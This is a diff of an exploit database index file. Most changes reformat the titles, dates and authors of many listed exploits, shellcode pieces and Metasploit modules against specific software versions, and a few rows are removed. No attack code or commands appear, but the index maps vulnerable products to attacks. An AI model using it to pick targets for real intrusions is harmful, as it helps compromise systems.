14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",php,webapps,0
|
||||
|
@ -12443,8 +12443,8 @@ id,file,description,date,author,platform,type,port
|
|||
14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0
|
||||
14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - (products.php) Blind SQL Injection",2010-06-30,Dante90,php,webapps,0
|
||||
14126,platforms/php/webapps/14126.txt,"Joomla! Component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0
|
||||
14127,platforms/php/webapps/14127.txt,"Joomla! Component Joomanager - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0
|
||||
14126,platforms/php/webapps/14126.txt,"Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0
|
||||
14127,platforms/php/webapps/14127.txt,"Joomla! Component 'Joomanager' - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0
|
||||
14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - (member.php) SQL Injection",2010-06-30,Dante90,php,webapps,0
|
||||
14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0
|
||||
14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0
|
||||
|
@ -12457,9 +12457,9 @@ id,file,description,date,author,platform,type,port
|
|||
14151,platforms/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - (post.php) Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
|
||||
14152,platforms/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - (forumdisplay.php) Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
|
||||
14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0
|
||||
14154,platforms/php/webapps/14154.txt,"Joomla! Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
|
||||
14154,platforms/php/webapps/14154.txt,"Joomla! Component 'com_dateconverter' 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
|
||||
14155,platforms/asp/webapps/14155.txt,"SIDA University System - SQL Injection",2010-07-01,K053,asp,webapps,0
|
||||
14209,platforms/php/webapps/14209.txt,"Joomla! Component Front-End Article Manager System - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14209,platforms/php/webapps/14209.txt,"Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14156,platforms/windows/dos/14156.txt,"Microsoft Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos,0
|
||||
14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,php,webapps,0
|
||||
14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection",2010-07-01,"Salvatore Fresta",php,webapps,0
|
||||
|
@ -12470,12 +12470,12 @@ id,file,description,date,author,platform,type,port
|
|||
14176,platforms/php/webapps/14176.c,"iScripts Socialware 2.2.x - Arbitrary File Upload",2010-07-02,"Salvatore Fresta",php,webapps,0
|
||||
14166,platforms/php/webapps/14166.txt,"Bit Weaver 2.7 - Local File Inclusion",2010-07-02,"John Leitch",php,webapps,0
|
||||
14171,platforms/php/webapps/14171.txt,"Iphone Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,php,webapps,0
|
||||
14172,platforms/php/webapps/14172.txt,"Joomla! Component Seyret Video (com_seyret) - Blind SQL Injection",2010-07-02,RoAd_KiLlEr,php,webapps,0
|
||||
14172,platforms/php/webapps/14172.txt,"Joomla! Component 'com_seyret' - Blind SQL Injection",2010-07-02,RoAd_KiLlEr,php,webapps,0
|
||||
14170,platforms/php/webapps/14170.txt,"Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,php,webapps,0
|
||||
14168,platforms/asp/webapps/14168.txt,"VGM Forbin - 'article.asp' SQL Injection",2010-07-02,"Th3 RDX",asp,webapps,0
|
||||
14169,platforms/asp/webapps/14169.txt,"MooreAdvice - 'productlist.asp' SQL Injection",2010-07-02,"Th3 RDX",asp,webapps,0
|
||||
14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - '.mp3' Local Stack Overflow (PoC)",2010-07-02,v3n0m,windows,dos,0
|
||||
14183,platforms/php/webapps/14183.txt,"Joomla! Component Seyret (com_seyret) - Local File Inclusion",2010-07-03,"Cooler_ unix",php,webapps,0
|
||||
14183,platforms/php/webapps/14183.txt,"Joomla! Component 'com_seyret' - Local File Inclusion",2010-07-03,"Cooler_ unix",php,webapps,0
|
||||
14179,platforms/windows/remote/14179.txt,"Microsoft IIS 5.0 - Authentication Bypass (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0
|
||||
14180,platforms/windows/remote/14180.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
|
||||
14181,platforms/windows/remote/14181.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
|
||||
|
@ -12485,14 +12485,14 @@ id,file,description,date,author,platform,type,port
|
|||
14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0
|
||||
14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
|
||||
14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0
|
||||
14187,platforms/php/webapps/14187.txt,"Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0
|
||||
14187,platforms/php/webapps/14187.txt,"Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0
|
||||
14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account)",2010-07-03,G0D-F4Th3r,php,webapps,0
|
||||
14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0
|
||||
14193,platforms/php/webapps/14193.c,"iscripts Socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0
|
||||
14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Exploit",2010-07-03,dmc,windows,remote,0
|
||||
14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)",2010-07-03,blake,windows,remote,0
|
||||
14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,php,webapps,0
|
||||
14196,platforms/php/webapps/14196.txt,"Joomla! Component SocialAds com_socialads - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0
|
||||
14196,platforms/php/webapps/14196.txt,"Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0
|
||||
14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injections",2010-07-03,"Salvatore Fresta",php,webapps,0
|
||||
14198,platforms/php/webapps/14198.txt,"WordPress Plugin Simple:Press 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",php,webapps,0
|
||||
14199,platforms/php/webapps/14199.txt,"PHPaaCMS 0.3.1 - (show.php?id=) SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0
|
||||
|
@ -12503,11 +12503,11 @@ id,file,description,date,author,platform,type,port
|
|||
14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
|
||||
14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
|
||||
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
|
||||
14207,platforms/php/webapps/14207.txt,"Joomla! Component Phoca Gallery (com_phocagallery) - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
|
||||
14210,platforms/php/webapps/14210.txt,"Joomla! Component Front-edit Address Book (com_addressbook) - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14207,platforms/php/webapps/14207.txt,"Joomla! Component 'com_phocagallery' - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
|
||||
14210,platforms/php/webapps/14210.txt,"Joomla! Component 'com_addressbook' - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-07-05,Node,windows,remote,0
|
||||
14211,platforms/php/webapps/14211.txt,"Joomla! Component NijnaMonials (com_ninjamonials) - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14213,platforms/php/webapps/14213.txt,"Joomla! Component SEF (com_sef) - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
|
||||
14211,platforms/php/webapps/14211.txt,"Joomla! Component 'com_ninjamonials' - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
|
||||
14213,platforms/php/webapps/14213.txt,"Joomla! Component 'com_sef' - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
|
||||
14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)",2010-07-05,saudi0hacker,php,webapps,0
|
||||
14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0
|
||||
14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - bind shell port 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0
|
||||
|
@ -12525,7 +12525,7 @@ id,file,description,date,author,platform,type,port
|
|||
14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script - 'articlesdetails.php' SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
|
||||
14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
|
||||
33410,platforms/php/webapps/33410.txt,"Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection",2009-12-16,"Justin C. Klein Keane",php,webapps,0
|
||||
14232,platforms/php/webapps/14232.txt,"Joomla! Component JPodium (com_jpodium) - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
|
||||
14232,platforms/php/webapps/14232.txt,"Joomla! Component 'com_jpodium' - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
|
||||
14233,platforms/php/webapps/14233.txt,"Bs Auction Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
|
||||
14234,platforms/linux/shellcode/14234.c,"Linux - 125 bind port to 6778 XOR encoded polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
|
||||
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800
|
||||
|
@ -12540,7 +12540,7 @@ id,file,description,date,author,platform,type,port
|
|||
14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
|
||||
14245,platforms/php/webapps/14245.txt,"Pre Multiple Vendors Shopping Malls - SQL Injection / Authentication Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps,0
|
||||
14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String Attack Exploit",2010-07-06,l3D,windows,remote,0
|
||||
14249,platforms/php/webapps/14249.txt,"Joomla! Component com_autartimonial - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
|
||||
14249,platforms/php/webapps/14249.txt,"Joomla! Component 'com_autartimonial' - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
|
||||
14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0
|
||||
14254,platforms/osx/remote/14254.py,"Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Exploit",2010-07-06,d1dn0t,osx,remote,0
|
||||
14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - Cross-Site Request Forgery",2010-07-08,"Rosario Valotta",windows,webapps,0
|
||||
|
@ -13781,7 +13781,7 @@ id,file,description,date,author,platform,type,port
|
|||
15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0
|
||||
15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0
|
||||
15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1)",2010-12-29,Saif,php,webapps,0
|
||||
15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service",2010-12-29,emgent,windows,dos,0
|
||||
15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2)",2010-12-29,emgent,windows,dos,0
|
||||
15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
|
||||
15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
|
||||
15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -14715,7 +14715,7 @@ id,file,description,date,author,platform,type,port
|
|||
16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
|
||||
16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps,0
|
||||
16905,platforms/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,cgi,webapps,0
|
||||
16906,platforms/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0
|
||||
16906,platforms/php/webapps/16906.rb,"Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0
|
||||
16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps,0
|
||||
16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution (Metasploit)",2010-07-14,Metasploit,cgi,webapps,0
|
||||
16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0
|
||||
|
@ -19595,7 +19595,7 @@ id,file,description,date,author,platform,type,port
|
|||
22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection (Metasploit)",2012-10-28,Metasploit,multiple,remote,0
|
||||
22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode - coda.exe 0x8c Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0
|
||||
22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0
|
||||
22330,platforms/windows/dos/22330.txt,"Microsoft Excel 2010 - Crash PoC (1)",2012-10-29,coolkaveh,windows,dos,0
|
||||
22330,platforms/windows/dos/22330.txt,"Microsoft Excel 2010 - Crash (PoC) (1)",2012-10-29,coolkaveh,windows,dos,0
|
||||
22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0
|
||||
22333,platforms/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (1)",2003-03-05,"Paul Szabo",windows,dos,0
|
||||
22334,platforms/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (2)",2003-03-05,"Paul Szabo",windows,dos,0
|
||||
|
@ -21861,7 +21861,6 @@ id,file,description,date,author,platform,type,port
|
|||
24655,platforms/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps,0
|
||||
24656,platforms/php/remote/24656.txt,"PHP 4.x/5.0.1 - PHP_Variables Remote Memory Disclosure",2004-09-15,"Stefano Di Paola",php,remote,0
|
||||
24657,platforms/php/webapps/24657.txt,"BlackBoard Internet NewsBoard System 1.5.1 - Remote File Inclusion",2004-10-06,"Lin Xiaofeng",php,webapps,0
|
||||
24658,platforms/php/webapps/24658.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2004-10-06,"Pedro Sanches",php,webapps,0
|
||||
24659,platforms/php/webapps/24659.txt,"DCP-Portal 3.7/4.x/5.x - calendar.php Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0
|
||||
24660,platforms/php/webapps/24660.txt,"DCP-Portal 3.7/4.x/5.x - 'index.php' Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0
|
||||
24661,platforms/php/webapps/24661.txt,"DCP-Portal 3.7/4.x/5.x - announcement.php cid Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0
|
||||
|
@ -22297,7 +22296,7 @@ id,file,description,date,author,platform,type,port
|
|||
25094,platforms/windows/remote/25094.c,"Microsoft MSN Messenger 6.2.0137 - '.png' Buffer Overflow",2005-02-08,ATmaCA,windows,remote,0
|
||||
25095,platforms/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 - Mouse Event URI Status Bar Obfuscation",2005-02-14,Paul,windows,remote,0
|
||||
25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x - Debug Remote Information Disclosure",2005-02-14,GHC,cgi,webapps,0
|
||||
25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0
|
||||
25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0
|
||||
25098,platforms/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Traversal Arbitrary File Access",2005-02-14,"John Cobb",php,webapps,0
|
||||
25099,platforms/php/webapps/25099.txt,"CitrusDB 0.3.6 - importcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0
|
||||
25100,platforms/php/webapps/25100.txt,"CitrusDB 0.3.6 - uploadcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0
|
||||
|
@ -30597,7 +30596,6 @@ id,file,description,date,author,platform,type,port
|
|||
33856,platforms/php/webapps/33856.txt,"Viennabux Beta! - 'cat' Parameter SQL Injection",2010-04-09,"Easy Laster",php,webapps,0
|
||||
33858,platforms/php/webapps/33858.txt,"DBSite wb CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0
|
||||
34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0
|
||||
34144,platforms/php/webapps/34144.txt,"Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting",2010-06-08,"L0rd CrusAd3r",php,webapps,0
|
||||
34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0
|
||||
34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",php,webapps,0
|
||||
34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'Username' Parameter Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0
|
||||
|
@ -30727,8 +30725,8 @@ id,file,description,date,author,platform,type,port
|
|||
34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote,0
|
||||
34003,platforms/php/webapps/34003.txt,"Joomla! Component Percha Image Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34004,platforms/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34005,platforms/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34006,platforms/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34005,platforms/php/webapps/34005.txt,"Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34006,platforms/php/webapps/34006.txt,"Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
|
||||
34008,platforms/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'index.php' Controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
|
||||
34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow (Metasploit)",2014-07-08,Metasploit,windows,remote,20010
|
||||
|
@ -30776,7 +30774,6 @@ id,file,description,date,author,platform,type,port
|
|||
34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection",2010-05-28,"High-Tech Bridge SA",php,webapps,0
|
||||
34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps,0
|
||||
34055,platforms/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0
|
||||
34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
|
||||
34057,platforms/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps,0
|
||||
34058,platforms/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
|
||||
34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0
|
||||
|
@ -30789,11 +30786,10 @@ id,file,description,date,author,platform,type,port
|
|||
34068,platforms/php/webapps/34068.html,"CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery",2010-01-01,"Truong Thao Nguyen",php,webapps,0
|
||||
34069,platforms/windows/dos/34069.html,"Microsoft Internet Explorer 8 - CSS 'expression' Remote Denial of Service",2010-01-01,MustLive,windows,dos,0
|
||||
34070,platforms/php/webapps/34070.txt,"Datetopia Match Agency BiZ - Multiple Cross-Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,php,webapps,0
|
||||
34071,platforms/php/webapps/34071.txt,"Joomla! Component com_sar_news - 'id' Parameter SQL Injection",2010-06-02,LynX,php,webapps,0
|
||||
34071,platforms/php/webapps/34071.txt,"Joomla! Component 'com_sar_news' - 'id' Parameter SQL Injection",2010-06-02,LynX,php,webapps,0
|
||||
34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps,0
|
||||
34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0
|
||||
34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0
|
||||
34114,platforms/php/webapps/34114.txt,"Joomla! Component Jreservation - Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0
|
||||
34086,platforms/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443
|
||||
34087,platforms/php/webapps/34087.txt,"Joomla! Component 'com_youtubegallery' - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80
|
||||
34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0
|
||||
|
@ -30807,7 +30803,6 @@ id,file,description,date,author,platform,type,port
|
|||
34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting",2009-12-30,emgent,php,webapps,0
|
||||
34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0
|
||||
34085,platforms/php/webapps/34085.txt,"WordPress Plugin Gigya Socialize 1.0/1.1.x - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0
|
||||
34137,platforms/php/webapps/34137.txt,"Joomla! Component com_videowhisper_2wvc - Cross-Site Scripting",2010-06-10,Sid3^effects,php,webapps,0
|
||||
34088,platforms/android/remote/34088.html,"Boat Browser 8.0 / 8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0
|
||||
34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80
|
||||
34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution",2014-07-16,"Cal Leeming",multiple,dos,0
|
||||
|
@ -30858,7 +30853,7 @@ id,file,description,date,author,platform,type,port
|
|||
34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
|
||||
34149,platforms/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0
|
||||
34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service",2010-06-17,"Luigi Auriemma",windows,dos,0
|
||||
34159,platforms/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
|
||||
34159,platforms/php/webapps/34159.txt,"Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
|
||||
34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0
|
||||
34152,platforms/linux/remote/34152.txt,"CUPS 1.4.2 - Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote,0
|
||||
34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution",2014-07-24,LiquidWorm,php,remote,80
|
||||
|
@ -30946,7 +30941,7 @@ id,file,description,date,author,platform,type,port
|
|||
34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0
|
||||
34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",multiple,dos,0
|
||||
34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial Of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0
|
||||
